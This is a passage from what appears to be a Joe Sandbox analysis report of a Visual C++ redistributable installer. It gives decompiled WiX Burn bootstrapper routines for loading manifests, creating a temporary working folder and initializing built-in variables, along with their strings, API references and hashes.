                                                                          											E0005012F(_t149, "Failed to overwrite the %ls built-in variable.", L"WixBundleElevated");
                                                                          										}
                                                                          									} else {
                                                                          										_push("Failed to parse command line.");
                                                                          										goto L38;
                                                                          									}
                                                                          								} else {
                                                                          									_push("Failed to load manifest.");
                                                                          									goto L38;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to get manifest stream from container.");
                                                                          								goto L38;
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed to open manifest stream.");
                                                                          							goto L38;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to open attached UX container.");
                                                                          						goto L38;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to initialize variables.");
                                                                          					L38:
                                                                          					_push(_t152);
                                                                          					E0005012F();
                                                                          				}
                                                                          				_t116 = _v24;
                                                                          				if(_v24 != 0) {
                                                                          					E000554EF(_t116);
                                                                          				}
                                                                          				if(_v16 != 0) {
                                                                          					E000554EF(_v16);
                                                                          				}
                                                                          				_t117 = _v8;
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_t117);
                                                                          				}
                                                                          				E0001C055(_t135,  &_v124);
                                                                          				if(_v28 != 0) {
                                                                          					E000554EF(_v28);
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					E000554EF(_v12);
                                                                          				}
                                                                          				if(_v20 != 0) {
                                                                          					E00013999(_v20); // executed
                                                                          				}
                                                                          				return _t152;
                                                                          			}






























                                                                          Strings
                                                                          • Failed to set source process path variable., xrefs: 000274F7
                                                                          • WixBundleElevated, xrefs: 000274B3, 000274C4
                                                                          • Failed to set source process folder variable., xrefs: 00027533
                                                                          • Failed to open attached UX container., xrefs: 0002739B
                                                                          • Failed to initialize variables., xrefs: 0002737E
                                                                          • Failed to get source process folder from path., xrefs: 00027513
                                                                          • WixBundleSourceProcessPath, xrefs: 000274E6
                                                                          • Failed to get unique temporary folder for bootstrapper application., xrefs: 000275BC
                                                                          • Failed to load catalog files., xrefs: 000275FD
                                                                          • Failed to parse command line., xrefs: 00027474
                                                                          • Failed to load manifest., xrefs: 000273F5
                                                                          • Failed to initialize internal cache functionality., xrefs: 0002758D
                                                                          • WixBundleSourceProcessFolder, xrefs: 00027522
                                                                          • Failed to open manifest stream., xrefs: 000273B8
                                                                          • Failed to set original source variable., xrefs: 00027558
                                                                          • Failed to extract bootstrapper application payloads., xrefs: 000275DD
                                                                          • Failed to overwrite the %ls built-in variable., xrefs: 000274C9
                                                                          • Failed to get manifest stream from container., xrefs: 000273D9
                                                                          • WixBundleOriginalSource, xrefs: 00027547
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalInitializeSection
                                                                          • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath
                                                                          • API String ID: 32694325-252221001
                                                                          • Opcode ID: 564a2fb453f089d867f136f3fb4852f88ce7f1615db8b185f9a8b1655f306bd6
                                                                          • Instruction ID: 3df8973cfc4b2863af24c93dfc649fcb7449c12a3e59fbb47cc16055a2364c8b
                                                                          • Opcode Fuzzy Hash: 564a2fb453f089d867f136f3fb4852f88ce7f1615db8b185f9a8b1655f306bd6
                                                                          • Instruction Fuzzy Hash: 76918872944A3ABBDB22DAA4DC55EEFB7ACBF04700F000226FA09E7141D771DA448BD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1476 280ae-280f7 call 3f670 1479 28270-2827d call 121a5 1476->1479 1480 280fd-2810b GetCurrentProcess call 5076c 1476->1480 1487 2827f 1479->1487 1488 2828c-2829e call 3de36 1479->1488 1483 28110-2811d 1480->1483 1485 28123-28132 GetWindowsDirectoryW 1483->1485 1486 281ab-281b9 GetTempPathW 1483->1486 1492 28134-28167 call 137d3 1485->1492 1493 2816c-2817d call 1338f 1485->1493 1490 281f3-28205 UuidCreate 1486->1490 1491 281bb-281ee call 137d3 1486->1491 1494 28284-2828b call 5012f 1487->1494 1495 28207-2820c 1490->1495 1496 2820e-28223 StringFromGUID2 1490->1496 1491->1494 1492->1494 1507 28189-2819f call 136b4 1493->1507 1508 2817f-28184 1493->1508 1494->1488 1495->1494 1501 28241-28262 call 11f20 1496->1501 1502 28225-2823f call 137d3 1496->1502 1518 28264-28269 1501->1518 1519 2826b 1501->1519 1502->1494 1507->1490 1520 281a1-281a6 1507->1520 1508->1494 1518->1494 1519->1479 1520->1494
                                                                          C-Code - Quality: 52%
                                                                          			E000280AE(void* __edx, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				char _v88;
                                                                          				short _v608;
                                                                          				char _v624;
                                                                          				signed int _v628;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t18;
                                                                          				intOrPtr _t23;
                                                                          				signed int _t32;
                                                                          				signed int _t33;
                                                                          				signed int _t35;
                                                                          				signed short _t40;
                                                                          				signed short _t48;
                                                                          				intOrPtr _t51;
                                                                          				void* _t52;
                                                                          				void* _t57;
                                                                          				void* _t58;
                                                                          				signed int _t60;
                                                                          				signed int _t64;
                                                                          				signed int _t68;
                                                                          
                                                                          				_t57 = __edx;
                                                                          				_t18 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t18 ^ _t68;
                                                                          				_v628 = _v628 & 0x00000000;
                                                                          				_t51 = _a8;
                                                                          				E0003F670(_t58,  &_v608, 0, 0x208);
                                                                          				_t59 =  &_v624;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t23 =  *0x7aa94; // 0x0
                                                                          				if(_t23 != 0) {
                                                                          					L17:
                                                                          					_t60 = E000121A5(_t51, _t23, 0);
                                                                          					__eflags = _t60;
                                                                          					if(_t60 < 0) {
                                                                          						_push("Failed to copy working folder path.");
                                                                          						goto L19;
                                                                          					}
                                                                          				} else {
                                                                          					E0005076C(GetCurrentProcess(),  &_v628); // executed
                                                                          					if(_v628 == 0) {
                                                                          						_t32 = GetTempPathW(0x104,  &_v608);
                                                                          						__eflags = _t32;
                                                                          						if(_t32 != 0) {
                                                                          							goto L10;
                                                                          						} else {
                                                                          							_t40 = GetLastError();
                                                                          							__eflags = _t40;
                                                                          							_t64 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
                                                                          							__eflags = _t64;
                                                                          							_t60 =  >=  ? 0x80004005 : _t64;
                                                                          							E000137D3(0x80004005, "cache.cpp", 0x46b, _t60);
                                                                          							_push("Failed to get temp path for working folder.");
                                                                          							goto L19;
                                                                          						}
                                                                          					} else {
                                                                          						_t59 = 0x104;
                                                                          						if(GetWindowsDirectoryW( &_v608, 0x104) != 0) {
                                                                          							_t60 = E0001338F(_t52, __eflags,  &_v608, 0x104);
                                                                          							__eflags = _t60;
                                                                          							if(_t60 >= 0) {
                                                                          								_t60 = E000136B4(_t52,  &_v608, 0x104, L"Temp\\");
                                                                          								__eflags = _t60;
                                                                          								if(_t60 >= 0) {
                                                                          									L10:
                                                                          									_t33 =  &_v624;
                                                                          									__imp__UuidCreate(_t33);
                                                                          									_t60 = _t33 | 0x00000001;
                                                                          									__eflags = _t60;
                                                                          									if(_t60 >= 0) {
                                                                          										_t35 =  &_v624;
                                                                          										__imp__StringFromGUID2(_t35,  &_v88, 0x27);
                                                                          										__eflags = _t35;
                                                                          										if(_t35 != 0) {
                                                                          											_push( &_v88);
                                                                          											_t60 = E00011F20(0x7aa94, L"%ls%ls\\",  &_v608);
                                                                          											__eflags = _t60;
                                                                          											if(_t60 >= 0) {
                                                                          												_t23 =  *0x7aa94; // 0x0
                                                                          												goto L17;
                                                                          											} else {
                                                                          												_push("Failed to append bundle id on to temp path for working folder.");
                                                                          												goto L19;
                                                                          											}
                                                                          										} else {
                                                                          											_t60 = 0x8007000e;
                                                                          											E000137D3(_t35, "cache.cpp", 0x475, 0x8007000e);
                                                                          											_push("Failed to convert working folder guid into string.");
                                                                          											goto L19;
                                                                          										}
                                                                          									} else {
                                                                          										_push("Failed to create working folder guid.");
                                                                          										goto L19;
                                                                          									}
                                                                          								} else {
                                                                          									_push("Failed to concat Temp directory on windows path for working folder.");
                                                                          									goto L19;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to ensure windows path for working folder ended in backslash.");
                                                                          								goto L19;
                                                                          							}
                                                                          						} else {
                                                                          							_t48 = GetLastError();
                                                                          							_t67 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          							_t60 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "cache.cpp", 0x460, _t60);
                                                                          							_push("Failed to get windows path for working folder.");
                                                                          							L19:
                                                                          							_push(_t60);
                                                                          							E0005012F();
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return E0003DE36(_t51, _v8 ^ _t68, _t57, _t59, _t60);
                                                                          			}



























                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00015381), ref: 00028104
                                                                            • Part of subcall function 0005076C: OpenProcessToken.ADVAPI32(?,00000008,?,000152B5,00000000,?,?,?,?,?,?,?,000274AB,00000000), ref: 0005078A
                                                                            • Part of subcall function 0005076C: GetLastError.KERNEL32(?,?,?,?,?,?,?,000274AB,00000000), ref: 00050794
                                                                            • Part of subcall function 0005076C: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,000274AB,00000000), ref: 0005081D
                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 0002812A
                                                                          • GetLastError.KERNEL32 ref: 00028134
                                                                          • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 000281B1
                                                                          • GetLastError.KERNEL32 ref: 000281BB
                                                                          Strings
                                                                          • Failed to get windows path for working folder., xrefs: 00028162
                                                                          • Failed to ensure windows path for working folder ended in backslash., xrefs: 0002817F
                                                                          • %ls%ls\, xrefs: 0002824C
                                                                          • Failed to copy working folder path., xrefs: 0002827F
                                                                          • Failed to create working folder guid., xrefs: 00028207
                                                                          • Failed to convert working folder guid into string., xrefs: 0002823A
                                                                          • Temp\, xrefs: 00028189
                                                                          • cache.cpp, xrefs: 00028158, 000281DF, 00028230
                                                                          • Failed to get temp path for working folder., xrefs: 000281E9
                                                                          • Failed to append bundle id on to temp path for working folder., xrefs: 00028264
                                                                          • Failed to concat Temp directory on windows path for working folder., xrefs: 000281A1
                                                                          • @Met, xrefs: 00028134, 000281BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$Process$ChangeCloseCurrentDirectoryFindNotificationOpenPathTempTokenWindows
                                                                          • String ID: %ls%ls\$@Met$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                          • API String ID: 58964441-2272642251
                                                                          • Opcode ID: ff04abeb5dba90d0d4068b9df650a7dc8120f38ffc1c05f1e161a8e94c7b58ad
                                                                          • Instruction ID: 261a5edb449a84e7a54ebb009c13a2ba7d2e192d5bf927548ebcce527bc9318e
                                                                          • Opcode Fuzzy Hash: ff04abeb5dba90d0d4068b9df650a7dc8120f38ffc1c05f1e161a8e94c7b58ad
                                                                          • Instruction Fuzzy Hash: 1841F976F41B34B7EB6096A49C4AFEB73ACAB00711F008155FE05FB180EA759D4887E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1521 17503-17dc0 InitializeCriticalSection 1522 17dc3-17de0 call 15530 1521->1522 1525 17de2-17de9 1522->1525 1526 17ded-17dfb call 5012f 1522->1526 1525->1522 1527 17deb 1525->1527 1529 17dfe-17e10 call 3de36 1526->1529 1527->1529
                                                                          C-Code - Quality: 100%
                                                                          			E00017503(struct _CRITICAL_SECTION* _a4) {
                                                                          				signed int _v8;
                                                                          				intOrPtr _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				intOrPtr _v24;
                                                                          				char* _v28;
                                                                          				intOrPtr _v32;
                                                                          				char _v36;
                                                                          				intOrPtr _v40;
                                                                          				intOrPtr _v44;
                                                                          				char* _v48;
                                                                          				intOrPtr _v52;
                                                                          				char _v56;
                                                                          				char _v60;
                                                                          				intOrPtr _v64;
                                                                          				char* _v68;
                                                                          				intOrPtr _v72;
                                                                          				char _v76;
                                                                          				char _v80;
                                                                          				intOrPtr _v84;
                                                                          				char* _v88;
                                                                          				intOrPtr _v92;
                                                                          				char _v96;
                                                                          				intOrPtr _v100;
                                                                          				intOrPtr _v104;
                                                                          				char* _v108;
                                                                          				intOrPtr _v112;
                                                                          				char _v116;
                                                                          				char _v120;
                                                                          				intOrPtr _v124;
                                                                          				char* _v128;
                                                                          				intOrPtr _v132;
                                                                          				char _v136;
                                                                          				char _v140;
                                                                          				intOrPtr _v144;
                                                                          				char* _v148;
                                                                          				intOrPtr _v152;
                                                                          				char _v156;
                                                                          				char _v160;
                                                                          				intOrPtr _v164;
                                                                          				char* _v168;
                                                                          				intOrPtr _v172;
                                                                          				intOrPtr _v176;
                                                                          				char _v180;
                                                                          				intOrPtr _v184;
                                                                          				char* _v188;
                                                                          				intOrPtr _v192;
                                                                          				char _v196;
                                                                          				char _v200;
                                                                          				intOrPtr _v204;
                                                                          				char* _v208;
                                                                          				intOrPtr _v212;
                                                                          				char _v216;
                                                                          				char _v220;
                                                                          				intOrPtr _v224;
                                                                          				char* _v228;
                                                                          				intOrPtr _v232;
                                                                          				char _v236;
                                                                          				char _v240;
                                                                          				intOrPtr _v244;
                                                                          				char* _v248;
                                                                          				char _v252;
                                                                          				char _v256;
                                                                          				char _v260;
                                                                          				intOrPtr _v264;
                                                                          				char* _v268;
                                                                          				char _v272;
                                                                          				char _v276;
                                                                          				intOrPtr _v280;
                                                                          				intOrPtr _v284;
                                                                          				char* _v288;
                                                                          				char _v292;
                                                                          				char _v296;
                                                                          				intOrPtr _v300;
                                                                          				intOrPtr _v304;
                                                                          				char* _v308;
                                                                          				char _v312;
                                                                          				char _v316;
                                                                          				intOrPtr _v320;
                                                                          				intOrPtr _v324;
                                                                          				char* _v328;
                                                                          				char _v332;
                                                                          				char _v336;
                                                                          				char _v340;
                                                                          				intOrPtr _v344;
                                                                          				char* _v348;
                                                                          				char _v352;
                                                                          				char _v356;
                                                                          				char _v360;
                                                                          				intOrPtr _v364;
                                                                          				char* _v368;
                                                                          				char _v372;
                                                                          				char _v376;
                                                                          				intOrPtr _v380;
                                                                          				intOrPtr _v384;
                                                                          				char* _v388;
                                                                          				char _v392;
                                                                          				char _v396;
                                                                          				intOrPtr _v400;
                                                                          				intOrPtr _v404;
                                                                          				char* _v408;
                                                                          				char _v412;
                                                                          				char _v416;
                                                                          				char _v420;
                                                                          				intOrPtr _v424;
                                                                          				char* _v428;
                                                                          				char _v432;
                                                                          				char _v436;
                                                                          				char _v440;
                                                                          				intOrPtr _v444;
                                                                          				char* _v448;
                                                                          				char _v452;
                                                                          				char _v456;
                                                                          				intOrPtr _v460;
                                                                          				intOrPtr _v464;
                                                                          				char* _v468;
                                                                          				char _v472;
                                                                          				char _v476;
                                                                          				char _v480;
                                                                          				intOrPtr _v484;
                                                                          				char* _v488;
                                                                          				char _v492;
                                                                          				char _v496;
                                                                          				intOrPtr _v500;
                                                                          				intOrPtr _v504;
                                                                          				char* _v508;
                                                                          				char _v512;
                                                                          				char _v516;
                                                                          				intOrPtr _v520;
                                                                          				intOrPtr _v524;
                                                                          				char* _v528;
                                                                          				char _v532;
                                                                          				char _v536;
                                                                          				intOrPtr _v540;
                                                                          				intOrPtr _v544;
                                                                          				char* _v548;
                                                                          				char _v552;
                                                                          				char _v556;
                                                                          				intOrPtr _v560;
                                                                          				intOrPtr _v564;
                                                                          				char* _v568;
                                                                          				char _v572;
                                                                          				char _v576;
                                                                          				char _v580;
                                                                          				intOrPtr _v584;
                                                                          				char* _v588;
                                                                          				char _v592;
                                                                          				char _v596;
                                                                          				intOrPtr _v600;
                                                                          				intOrPtr _v604;
                                                                          				char* _v608;
                                                                          				char _v612;
                                                                          				char _v616;
                                                                          				intOrPtr _v620;
                                                                          				intOrPtr _v624;
                                                                          				char* _v628;
                                                                          				char _v632;
                                                                          				char _v636;
                                                                          				intOrPtr _v640;
                                                                          				intOrPtr _v644;
                                                                          				char* _v648;
                                                                          				char _v652;
                                                                          				char _v656;
                                                                          				intOrPtr _v660;
                                                                          				intOrPtr _v664;
                                                                          				char* _v668;
                                                                          				char _v672;
                                                                          				char _v676;
                                                                          				intOrPtr _v680;
                                                                          				intOrPtr _v684;
                                                                          				char* _v688;
                                                                          				char _v692;
                                                                          				char _v696;
                                                                          				char _v700;
                                                                          				intOrPtr _v704;
                                                                          				char* _v708;
                                                                          				char _v712;
                                                                          				char _v716;
                                                                          				intOrPtr _v720;
                                                                          				intOrPtr _v724;
                                                                          				char* _v728;
                                                                          				char _v732;
                                                                          				char _v736;
                                                                          				intOrPtr _v740;
                                                                          				intOrPtr _v744;
                                                                          				char* _v748;
                                                                          				char _v752;
                                                                          				char _v756;
                                                                          				intOrPtr _v760;
                                                                          				intOrPtr _v764;
                                                                          				char* _v768;
                                                                          				char _v772;
                                                                          				char _v776;
                                                                          				intOrPtr _v780;
                                                                          				intOrPtr _v784;
                                                                          				char* _v788;
                                                                          				char _v792;
                                                                          				char _v796;
                                                                          				intOrPtr _v800;
                                                                          				intOrPtr _v804;
                                                                          				char* _v808;
                                                                          				char _v812;
                                                                          				char _v816;
                                                                          				intOrPtr _v820;
                                                                          				intOrPtr _v824;
                                                                          				char* _v828;
                                                                          				char _v832;
                                                                          				char _v836;
                                                                          				intOrPtr _v840;
                                                                          				intOrPtr _v844;
                                                                          				char* _v848;
                                                                          				char _v852;
                                                                          				char _v856;
                                                                          				intOrPtr _v860;
                                                                          				intOrPtr _v864;
                                                                          				char* _v868;
                                                                          				char _v872;
                                                                          				char _v876;
                                                                          				intOrPtr _v880;
                                                                          				intOrPtr _v884;
                                                                          				char* _v888;
                                                                          				char _v892;
                                                                          				char _v896;
                                                                          				intOrPtr _v900;
                                                                          				intOrPtr _v904;
                                                                          				char* _v908;
                                                                          				char _v912;
                                                                          				char _v916;
                                                                          				char _v920;
                                                                          				intOrPtr _v924;
                                                                          				char* _v928;
                                                                          				char _v932;
                                                                          				char _v936;
                                                                          				intOrPtr _v940;
                                                                          				intOrPtr _v944;
                                                                          				char* _v948;
                                                                          				char _v952;
                                                                          				char _v956;
                                                                          				char _v960;
                                                                          				intOrPtr _v964;
                                                                          				char* _v968;
                                                                          				char _v972;
                                                                          				char _v976;
                                                                          				char _v980;
                                                                          				intOrPtr _v984;
                                                                          				char* _v988;
                                                                          				char _v992;
                                                                          				char _v996;
                                                                          				intOrPtr _v1000;
                                                                          				intOrPtr _v1004;
                                                                          				char* _v1008;
                                                                          				char _v1012;
                                                                          				char _v1016;
                                                                          				intOrPtr _v1020;
                                                                          				intOrPtr _v1024;
                                                                          				char* _v1028;
                                                                          				char _v1032;
                                                                          				char _v1036;
                                                                          				char _v1040;
                                                                          				intOrPtr _v1044;
                                                                          				char* _v1048;
                                                                          				char _v1052;
                                                                          				char _v1056;
                                                                          				char _v1060;
                                                                          				intOrPtr _v1064;
                                                                          				char* _v1068;
                                                                          				char _v1072;
                                                                          				char _v1076;
                                                                          				char _v1080;
                                                                          				intOrPtr _v1084;
                                                                          				char* _v1088;
                                                                          				char _v1092;
                                                                          				char _v1096;
                                                                          				intOrPtr _v1100;
                                                                          				intOrPtr _v1104;
                                                                          				char* _v1108;
                                                                          				char _v1112;
                                                                          				char _v1116;
                                                                          				intOrPtr _v1120;
                                                                          				intOrPtr _v1124;
                                                                          				char* _v1128;
                                                                          				char _v1132;
                                                                          				char _v1136;
                                                                          				intOrPtr _v1140;
                                                                          				intOrPtr _v1144;
                                                                          				char* _v1148;
                                                                          				char _v1152;
                                                                          				char _v1156;
                                                                          				intOrPtr _v1160;
                                                                          				intOrPtr _v1164;
                                                                          				char* _v1168;
                                                                          				char _v1172;
                                                                          				char _v1176;
                                                                          				intOrPtr _v1180;
                                                                          				intOrPtr _v1184;
                                                                          				char* _v1188;
                                                                          				char _v1192;
                                                                          				char _v1196;
                                                                          				intOrPtr _v1200;
                                                                          				intOrPtr _v1204;
                                                                          				char* _v1208;
                                                                          				char _v1212;
                                                                          				char _v1216;
                                                                          				intOrPtr _v1220;
                                                                          				intOrPtr _v1224;
                                                                          				char* _v1228;
                                                                          				struct _CRITICAL_SECTION* _v1232;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t317;
                                                                          				struct _CRITICAL_SECTION* _t319;
                                                                          				intOrPtr _t320;
                                                                          				intOrPtr _t321;
                                                                          				intOrPtr _t322;
                                                                          				void* _t328;
                                                                          				intOrPtr _t333;
                                                                          				intOrPtr _t335;
                                                                          				intOrPtr _t336;
                                                                          				intOrPtr _t338;
                                                                          				intOrPtr _t342;
                                                                          				intOrPtr _t346;
                                                                          				intOrPtr* _t347;
                                                                          				char _t348;
                                                                          				signed int _t349;
                                                                          
                                                                          				_t317 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t317 ^ _t349;
                                                                          				_t319 = _a4;
                                                                          				_v1232 = _t319;
                                                                          				InitializeCriticalSection(_t319);
                                                                          				_t348 = 0;
                                                                          				_v1228 = L"AdminToolsFolder";
                                                                          				_t320 = 0x2b;
                                                                          				_v1220 = 0x30;
                                                                          				_v1224 = E00015EAB;
                                                                          				_v1216 = 0;
                                                                          				_t335 = 6;
                                                                          				_v1212 = 0;
                                                                          				_v1208 = L"AppDataFolder";
                                                                          				_v1204 = E00015EAB;
                                                                          				_v1200 = 0x1a;
                                                                          				_v1196 = 0;
                                                                          				_v1192 = 0;
                                                                          				_v1188 = L"CommonAppDataFolder";
                                                                          				_v1184 = E00015EAB;
                                                                          				_v1180 = 0x23;
                                                                          				_v1176 = 0;
                                                                          				_v1172 = 0;
                                                                          				_v1168 = L"CommonFiles64Folder";
                                                                          				_v1164 = E00016418;
                                                                          				_v1160 = _t320;
                                                                          				_v1156 = 0;
                                                                          				_v1152 = 0;
                                                                          				_v1148 = L"CommonFilesFolder";
                                                                          				_v1144 = E00015EAB;
                                                                          				_v1140 = _t320;
                                                                          				_v1136 = 0;
                                                                          				_v1132 = 0;
                                                                          				_v1128 = L"CommonFiles6432Folder";
                                                                          				_v1124 = E00015D71;
                                                                          				_v1120 = _t320;
                                                                          				_v1116 = 0;
                                                                          				_v1112 = 0;
                                                                          				_v1108 = L"CompatibilityMode";
                                                                          				_v1104 = E00016184;
                                                                          				_v1100 = 0xc;
                                                                          				_v1096 = 0;
                                                                          				_v1092 = 0;
                                                                          				_v1088 = L"Date";
                                                                          				_v1084 = E00015F14;
                                                                          				_v1080 = 0;
                                                                          				_v1076 = 0;
                                                                          				_v1072 = 0;
                                                                          				_v1068 = L"ComputerName";
                                                                          				_v1064 = E00015E0B;
                                                                          				_v1060 = 0;
                                                                          				_v1056 = 0;
                                                                          				_v1052 = 0;
                                                                          				_v1048 = L"DesktopFolder";
                                                                          				_v1044 = E00015EAB;
                                                                          				_v1040 = 0;
                                                                          				_v1036 = 0;
                                                                          				_v1032 = 0;
                                                                          				_v1028 = L"FavoritesFolder";
                                                                          				_v1024 = E00015EAB;
                                                                          				_v1020 = _t335;
                                                                          				_v1016 = 0;
                                                                          				_v1012 = 0;
                                                                          				_v1008 = L"FontsFolder";
                                                                          				_v1004 = E00015EAB;
                                                                          				_v1000 = 0x14;
                                                                          				_v996 = 0;
                                                                          				_v992 = 0;
                                                                          				_v988 = L"InstallerName";
                                                                          				_v984 = E0001602F;
                                                                          				_v980 = 0;
                                                                          				_v976 = 0;
                                                                          				_v972 = 0;
                                                                          				_v968 = L"InstallerVersion";
                                                                          				_t321 = 5;
                                                                          				_v944 = E00015EAB;
                                                                          				_v904 = E00015EAB;
                                                                          				_t333 = 7;
                                                                          				_v840 = _t335;
                                                                          				_t336 = 9;
                                                                          				_v884 = E00016184;
                                                                          				_v864 = E00016184;
                                                                          				_v844 = E00016184;
                                                                          				_v824 = E00016184;
                                                                          				_v804 = E00016184;
                                                                          				_v784 = E00016184;
                                                                          				_v764 = E00016184;
                                                                          				_v744 = E00016184;
                                                                          				_t342 = 0xb;
                                                                          				_v964 = E0001605C;
                                                                          				_v960 = 0;
                                                                          				_v956 = 0;
                                                                          				_v952 = 0;
                                                                          				_v948 = L"LocalAppDataFolder";
                                                                          				_v940 = 0x1c;
                                                                          				_v936 = 0;
                                                                          				_v932 = 0;
                                                                          				_v928 = L"LogonUser";
                                                                          				_v924 = E000160BA;
                                                                          				_v920 = 0;
                                                                          				_v916 = 0;
                                                                          				_v912 = 0;
                                                                          				_v908 = L"MyPicturesFolder";
                                                                          				_v900 = 0x27;
                                                                          				_v896 = 0;
                                                                          				_v892 = 0;
                                                                          				_v888 = L"NTProductType";
                                                                          				_v880 = 4;
                                                                          				_v876 = 0;
                                                                          				_v872 = 0;
                                                                          				_v868 = L"NTSuiteBackOffice";
                                                                          				_v860 = _t321;
                                                                          				_v856 = 0;
                                                                          				_v852 = 0;
                                                                          				_v848 = L"NTSuiteDataCenter";
                                                                          				_v836 = 0;
                                                                          				_v832 = 0;
                                                                          				_v828 = L"NTSuiteEnterprise";
                                                                          				_v820 = E00015EAB;
                                                                          				_v816 = 0;
                                                                          				_v812 = 0;
                                                                          				_v808 = L"NTSuitePersonal";
                                                                          				_v800 = 8;
                                                                          				_v796 = 0;
                                                                          				_v792 = 0;
                                                                          				_v788 = L"NTSuiteSmallBusiness";
                                                                          				_v780 = _t336;
                                                                          				_v776 = 0;
                                                                          				_v772 = 0;
                                                                          				_v768 = L"NTSuiteSmallBusinessRestricted";
                                                                          				_v760 = 0xa;
                                                                          				_v756 = 0;
                                                                          				_v752 = 0;
                                                                          				_v748 = L"NTSuiteWebServer";
                                                                          				_v740 = E00016184;
                                                                          				_v736 = 0;
                                                                          				_v732 = 0;
                                                                          				_v728 = L"PersonalFolder";
                                                                          				_v724 = E00015EAB;
                                                                          				_v720 = _t321;
                                                                          				_v716 = 0;
                                                                          				_v712 = 0;
                                                                          				_v708 = L"Privileged";
                                                                          				_v704 = E00016360;
                                                                          				_v700 = 0;
                                                                          				_v696 = 0;
                                                                          				_v692 = 0;
                                                                          				_v688 = L"ProcessorArchitecture";
                                                                          				_v684 = E000165DF;
                                                                          				_v680 = 0xe;
                                                                          				_v676 = 0;
                                                                          				_t322 = 0x26;
                                                                          				_v660 = _t322;
                                                                          				_v640 = _t322;
                                                                          				_v620 = _t322;
                                                                          				_v604 = E00015EAB;
                                                                          				_v564 = E00015EAB;
                                                                          				_v524 = E00015EAB;
                                                                          				_v504 = E00015EAB;
                                                                          				_v520 = _t342;
                                                                          				_v624 = E00015D71;
                                                                          				_v560 = _t336;
                                                                          				_v484 = E000164B6;
                                                                          				_v464 = E000164B6;
                                                                          				_t346 = 2;
                                                                          				_v672 = 0;
                                                                          				_v668 = L"ProgramFiles64Folder";
                                                                          				_v664 = E00016418;
                                                                          				_v656 = 0;
                                                                          				_v652 = 0;
                                                                          				_v648 = L"ProgramFilesFolder";
                                                                          				_v644 = E00015EAB;
                                                                          				_v636 = 0;
                                                                          				_v632 = 0;
                                                                          				_v628 = L"ProgramFiles6432Folder";
                                                                          				_v616 = 0;
                                                                          				_v612 = 0;
                                                                          				_v608 = L"ProgramMenuFolder";
                                                                          				_v600 = E00015D71;
                                                                          				_v596 = 0;
                                                                          				_v592 = 0;
                                                                          				_v588 = L"RebootPending";
                                                                          				_v584 = E000163A9;
                                                                          				_v580 = 0;
                                                                          				_v576 = 0;
                                                                          				_v572 = 0;
